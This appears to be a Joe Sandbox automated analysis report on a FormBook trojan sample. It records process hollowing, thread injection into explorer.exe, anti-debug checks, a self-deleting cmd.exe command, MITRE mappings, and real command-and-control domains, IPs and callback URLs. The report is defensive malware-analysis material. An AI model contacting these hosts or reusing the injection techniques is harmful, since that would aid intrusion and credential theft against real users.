          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05471C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05471C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05471C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05471C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05471C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05471C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05471C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05471C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05471C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05471C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05471C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05471C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05471C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05471C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0548740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0548740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0548740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05436C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05436C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05436C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05436C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053D746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053EA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05488CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053C849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05436CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05436CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05436CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_054714FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053EE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053B4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053B4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05488F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053DF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053EA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053EA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0548070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0548070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0544FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0544FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053CFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053CEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053C8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05437794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05437794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05437794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0547AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0547AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053BE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053EA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053EA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053BC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053BC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess queried: DebugPort
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0040ACF0 LdrLoadDll,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 1_2_003B439B SetUnhandledExceptionFilter,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 1_2_003B43CC SetUnhandledExceptionFilter,UnhandledExceptionFilter,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_003B439B SetUnhandledExceptionFilter,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_003B43CC SetUnhandledExceptionFilter,UnhandledExceptionFilter,

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 188.114.96.10 80
          Source: C:\Windows\explorer.exeNetwork Connect: 154.85.152.171 80
          Source: C:\Windows\explorer.exeDomain query: www.informacion-numero-24-h.site
          Source: C:\Windows\explorer.exeDomain query: www.tzjisheng.com
          Sample uses process hollowing technique
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeSection unmapped: C:\Windows\SysWOW64\chkdsk.exe base address: 1040000
          Maps a DLL or memory area into another process
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeSection loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeSection loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeThread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeThread register set: target process: 3968
          Source: C:\Windows\SysWOW64\chkdsk.exeThread register set: target process: 3968
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeProcess created: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\naxsk
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe"
          Source: explorer.exe, 00000005.00000000.255915814.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.278458875.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.295991072.0000000000688000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ProgmanEXE^
          Source: explorer.exe, 00000005.00000000.278690681.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.265115735.00000000080ED000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.301324707.0000000005920000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000005.00000000.278690681.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.256196895.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.370103670.0000000000BE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000005.00000000.278690681.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.256196895.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.370103670.0000000000BE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000005.00000000.369902961.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.278476010.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.255927905.000000000069D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd4
          Source: explorer.exe, 00000005.00000000.278690681.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.256196895.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.370103670.0000000000BE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: WProgram Manager
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 1_2_003B3283 cpuid
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 1_2_003B3EC8 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,
          Source: C:\Users\user\Desktop\inlaww321345.exeCode function: 0_2_00403646 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 2.2.idczzzzbpy.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.idczzzzbpy.exe.700000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.idczzzzbpy.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.idczzzzbpy.exe.400000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.idczzzzbpy.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.idczzzzbpy.exe.700000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.idczzzzbpy.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.idczzzzbpy.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.idczzzzbpy.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.319433695.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.246864810.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.289205800.000000000AC3C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.306971961.000000000AC3C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.319619508.0000000001180000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.507830951.0000000000F50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.251263067.0000000000700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.248745140.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.507774952.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.319548614.0000000001150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 2.2.idczzzzbpy.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.idczzzzbpy.exe.700000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.idczzzzbpy.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.idczzzzbpy.exe.400000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.idczzzzbpy.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.idczzzzbpy.exe.700000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.idczzzzbpy.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.idczzzzbpy.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.idczzzzbpy.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.319433695.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.246864810.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.289205800.000000000AC3C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.306971961.000000000AC3C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.319619508.0000000001180000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.507830951.0000000000F50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.251263067.0000000000700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.248745140.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.507774952.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.319548614.0000000001150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts2
          Command and Scripting Interpreter          		Path Interception1
          Access Token Manipulation          		1
          Rootkit          		1
          Credential API Hooking          		1
          System Time Discovery          		Remote Services1
          Credential API Hooking          		Exfiltration Over Other Network Medium1
          Encrypted Channel          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
          System Shutdown/Reboot
          Default Accounts1
          Native API          		Boot or Logon Initialization Scripts512
          Process Injection          		2
          Virtualization/Sandbox Evasion          		LSASS Memory251
          Security Software Discovery          		Remote Desktop Protocol1
          Archive Collected Data          		Exfiltration Over Bluetooth1
          Ingress Tool Transfer          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain Accounts1
          Shared Modules          		Logon Script (Windows)Logon Script (Windows)1
          Access Token Manipulation          		Security Account Manager2
          Virtualization/Sandbox Evasion          		SMB/Windows Admin Shares1
          Clipboard Data          		Automated Exfiltration2
          Non-Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)512
          Process Injection          		NTDS2
          Process Discovery          		Distributed Component Object ModelInput CaptureScheduled Transfer12
          Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
          Deobfuscate/Decode Files or Information          		LSA Secrets1
          Remote System Discovery          		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common3
          Obfuscated Files or Information          		Cached Domain Credentials2
          File and Directory Discovery          		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items1
          Software Packing          		DCSync114
          System Information Discovery          		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 626561 Sample: inlaww321345.exe Startdate: 14/05/2022 Architecture: WINDOWS Score: 100 34 www.rodosmail.xyz 2->34 36 parkingpage.namecheap.com 2->36 50 Snort IDS alert for network traffic 2->50 52 Found malware configuration 2->52 54 Malicious sample detected (through community Yara rule) 2->54 56 7 other signatures 2->56 12 inlaww321345.exe 19 2->12         started        signatures3 process4 file5 32 C:\Users\user\AppData\...\idczzzzbpy.exe, PE32 12->32 dropped 15 idczzzzbpy.exe 12->15         started        process6 signatures7 66 Multi AV Scanner detection for dropped file 15->66 68 Tries to detect virtualization through RDTSC time measurements 15->68 18 idczzzzbpy.exe 15->18         started        process8 signatures9 42 Modifies the context of a thread in another process (thread injection) 18->42 44 Maps a DLL or memory area into another process 18->44 46 Sample uses process hollowing technique 18->46 48 Queues an APC in another process (thread injection) 18->48 21 explorer.exe 18->21 injected process10 dnsIp11 38 www.tzjisheng.com 154.85.152.171, 49810, 80 DXTL-HKDXTLTseungKwanOServiceHK Seychelles 21->38 40 www.informacion-numero-24-h.site 188.114.96.10, 49808, 80 CLOUDFLARENETUS European Union 21->40 58 System process connects to network (likely due to code injection or exploit) 21->58 25 chkdsk.exe 21->25         started        signatures12 process13 signatures14 60 Modifies the context of a thread in another process (thread injection) 25->60 62 Maps a DLL or memory area into another process 25->62 64 Tries to detect virtualization through RDTSC time measurements 25->64 28 cmd.exe 1 25->28         started        process15 process16 30 conhost.exe 28->30         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          inlaww321345.exe54%VirustotalBrowse
          inlaww321345.exe56%ReversingLabsWin32.Trojan.FormBook
          inlaww321345.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe46%ReversingLabsWin32.Trojan.FormBook

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          2.0.idczzzzbpy.exe.400000.7.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.2.idczzzzbpy.exe.700000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          2.0.idczzzzbpy.exe.400000.9.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          2.0.idczzzzbpy.exe.400000.5.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          2.2.idczzzzbpy.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          www.tzjisheng.com0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.tzjisheng.com/sn31/?p6Ah=2a7s6yRQu5sKFClQSChidlXjlxi9pt4Q5wJ1geib+tah5K7nc27GLkEkTe4Wsszvrpha&3fK84j=bDKp2PCxjp9Dyht00%Avira URL Cloudsafe
          www.boxberry-my.com/sn31/100%Avira URL Cloudmalware
          http://www.informacion-numero-24-h.site/sn31/?3fK84j=bDKp2PCxjp9Dyht0&p6Ah=F3OPTzYh/KYNQDx4mU9pmepphtdjiinNkarquV5J38/xiILCZYJsFfYNFvKas6or25OS0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          parkingpage.namecheap.com
          		198.54.117.212
          		truefalse
            		high
            www.informacion-numero-24-h.site
            		188.114.96.10
            		truetrue
              		unknown
              www.tzjisheng.com
              		154.85.152.171
              		truetrueunknown
              www.rodosmail.xyz
              		unknown
              		unknowntrue
                		unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://www.tzjisheng.com/sn31/?p6Ah=2a7s6yRQu5sKFClQSChidlXjlxi9pt4Q5wJ1geib+tah5K7nc27GLkEkTe4Wsszvrpha&3fK84j=bDKp2PCxjp9Dyht0true
                • Avira URL Cloud: safe
                		unknown
                www.boxberry-my.com/sn31/true
                • Avira URL Cloud: malware
                		low
                http://www.informacion-numero-24-h.site/sn31/?3fK84j=bDKp2PCxjp9Dyht0&p6Ah=F3OPTzYh/KYNQDx4mU9pmepphtdjiinNkarquV5J38/xiILCZYJsFfYNFvKas6or25OStrue
                • Avira URL Cloud: safe
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://nsis.sf.net/NSIS_ErrorErrorinlaww321345.exefalse
                  		high

                  World Map of Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public IPs

                  IPDomainCountryFlagASNASN NameMalicious
                  154.85.152.171
                  		www.tzjisheng.comSeychelles
                  		134548DXTL-HKDXTLTseungKwanOServiceHKtrue
                  188.114.96.10
                  		www.informacion-numero-24-h.siteEuropean Union
                  		13335CLOUDFLARENETUStrue

                  General Information

                  Joe Sandbox Version:34.0.0 Boulder Opal
                  Analysis ID:626561
                  Start date and time: 14/05/202213:06:162022-05-14 13:06:16 +02:00
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 9m 26s
                  Hypervisor based Inspection enabled:false
                  Report type:light
                  Sample file name:inlaww321345.exe
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                  Number of analysed new started processes analysed:28
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:1
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Detection:MAL
                  Classification:mal100.troj.evad.winEXE@9/4@3/2
                  EGA Information:
                  • Successful, ratio: 100%
                  HDC Information:
                  • Successful, ratio: 54.9% (good quality ratio 51%)
                  • Quality average: 76.7%
                  • Quality standard deviation: 29.8%
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 0
                  • Number of non-executed functions: 0
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Adjust boot time
                  • Enable AMSI

                  Warnings

                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                  • Excluded IPs from analysis (whitelisted): 173.222.108.226, 173.222.108.210
                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, arc.msn.com, wu-bg-shim.trafficmanager.net, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, ocsp.digicert.com, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net
                  • Not all processes where analyzed, report is missing behavior information

                  Simulations

                  Behavior and APIs

                  No simulations

                  Joe Sandbox View / Context

                  IPs

                  No context

                  Domains

                  No context

                  ASNs

                  No context

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  No context

                  Created / dropped Files

                  C:\Users\user\AppData\Local\Temp\c363o8ren09aotd

                  Download File
                  Process:C:\Users\user\Desktop\inlaww321345.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):189439
                  Entropy (8bit):7.991264884489158
                  Encrypted:true
                  SSDEEP:3072:RpjM1D/FiGY508jL8Ih5Ua5OtVtVN20+DLQLYUL11uXGI7dOPHl/vqJJr7iQxX4Y:Q1bY08jwy5UakVtVNAKYULKX5d2/vq7P
                  MD5:E3D27BCFA9AA0D4B5A3F6B09ABBD95A0
                  SHA1:FF9D9165EEB1BC30B24824E3179CE751D0D171CA
                  SHA-256:9367FD47E61A19528C3F5CF2C8DCB9A966AC2760E0E0303D98CB16569DC571C0
                  SHA-512:58C1AD3827E29D5948D5E20330D7B690700BB87618A9635C032FEA2B86435ED8B5D34C9959FABE652478CF775826325CE78E9310F4086159C1DF74E6FD64BBC2
                  Malicious:false
                  Reputation:low
                  Preview:...h.[.1...0..B..m.2h|..N.a..p....1..N....S.b.....n..s..g.;5..,-..G. 6.{.u.......Cx=.(..[y7*..}.u.....P.-J.....B......o6..$..U...'...z4.....<...M.y...Nt..Up..g..ElL.b.K..-bU<...F..J.p.z........r..RR.....#.Z.C...#.....AC..Uj..g... .....%.*........[.1W.4E+... ...zse.I.:......!.....N.$....b....An..s..gw;5...........D..."R..?...n....dU~...~ ..P.,$.G..n#.....$.y....o6.(..;.9.S..K..m4...j...j.....G./....}L..".P4...L.b.K..-..f.O.F.$..pPG........r..RR...._.U.....#.....AC..Uj..g..{ ..a....*.$......[.1...E+...@...3se.I.:..p....1..N....S.b.....n..s..gw;5...........D..."R..?...n....dU~...~ ..P.,$.G..n#.....$.y....o6.(..;.9.S..K..m4...j...j.....G./....}L..".P4...L.b.K..-bU<...F.I..pP4........r..RR...._.U..C..#.....AC..Uj..g..{ ..a....*.$......[.1...E+...@...3se.I.:..p....1..N....S.b.....n..s..gw;5...........D..."R..?...n....dU~...~ ..P.,$.G..n#.....$.y....o6.(..;.9.S..K..m4...j...j.....G./....}L..".P4...L.b.K..-bU<...F.I..pP4........r..RR...._.U..C..#.....A

                  C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe

                  Download File
                  Process:C:\Users\user\Desktop\inlaww321345.exe
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):80384
                  Entropy (8bit):6.294068907954178
                  Encrypted:false
                  SSDEEP:1536:q6TaC+v1wwfr0oxAomP3cX/4pi2sWjcdNdI:va5CwD1/ui5NW
                  MD5:0A3F789C1F124B76E2EDC74EBEACF70A
                  SHA1:780584F128175C82C09BE5237D6F18CA71F5AF8A
                  SHA-256:88475EA713BF4983BAD0C805626D4C36B4C7F556E0CFE3220D54A66AF49536ED
                  SHA-512:8E6E8107B29C2CBDEA7D0D10F40C0BCB5834C7EE72AD420354B1F10154F263029877F32CC4B66D20C75250C3F9ABEDE40DC9E74AD54472C30E52E5089FE8D1C4
                  Malicious:true
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 46%
